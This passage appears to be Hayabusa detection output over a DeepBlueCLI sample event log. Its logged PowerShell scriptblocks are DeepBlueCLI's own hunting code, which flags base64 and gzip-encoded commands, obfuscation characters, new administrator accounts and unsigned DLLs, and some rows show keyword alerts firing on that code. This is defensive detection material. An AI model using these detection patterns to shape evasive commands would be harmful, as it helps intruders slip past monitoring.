{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command.
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net.
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.708 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group.
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.714 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file.
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:01.717 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application""
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:47:15.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way.
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services.
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:47:15.910 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:49:18.979 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell.
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" 